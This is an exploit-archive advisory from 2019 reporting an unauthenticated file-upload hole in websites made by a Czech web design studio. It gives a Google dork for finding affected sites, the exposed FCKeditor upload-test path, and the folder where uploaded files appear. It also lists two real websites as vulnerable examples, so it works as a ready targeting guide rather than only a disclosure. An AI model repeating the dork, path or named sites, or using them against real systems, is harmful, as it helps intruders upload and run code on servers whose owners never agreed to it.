Schwabe Slovakia WebDesign Studio Nandu Unauthorized File Insertion

2019.05.21
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

#################################################################### # Exploit Title : Schwabe Slovakia Studio Nandu Unauthorized File Insertion # Author [ Discovered By ] : KingSkrupellos # Team : Cyberizm Digital Security Army # Date : 21/05/2019 # Vendor Homepage : nandu.cz # Tested On : Windows and Linux # Category : WebApps # Exploit Risk : Medium # Google Dorks : intext:Copyright © 2012 Schwabe Slovakia s.r.o., webdesign studio nandu # Vulnerability Type : CWE-264 [ Permissions, Privileges, and Access Controls ] # PacketStormSecurity : packetstormsecurity.com/files/authors/13968 # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/ # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos #################################################################### # Description About Software : ***************************** Schwabe Slovakia Studio Nandu is a Web Design Company in Czech Republic. #################################################################### # Impact : *********** Schwabe Slovakia Studio Nandu is prone to a vulnerability that lets attackers upload arbitrary files because it fails to adequately sanitize user-supplied input. An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the webserver process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible. #################################################################### # Arbitrary File Upload / Unauthorized File Insert Exploit : ************************************************** /admin/fckeditor/editor/filemanager/connectors/uploadtest.html Directory File Path : ******************* /_data_editor/[YOURFILENAME].txt .jpg .gif .png #################################################################### # Example Vulnerable Sites : ************************ [+] sinupret.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html [+] kaloba.sk/admin/fckeditor/editor/filemanager/connectors/uploadtest.html #################################################################### # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team ####################################################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top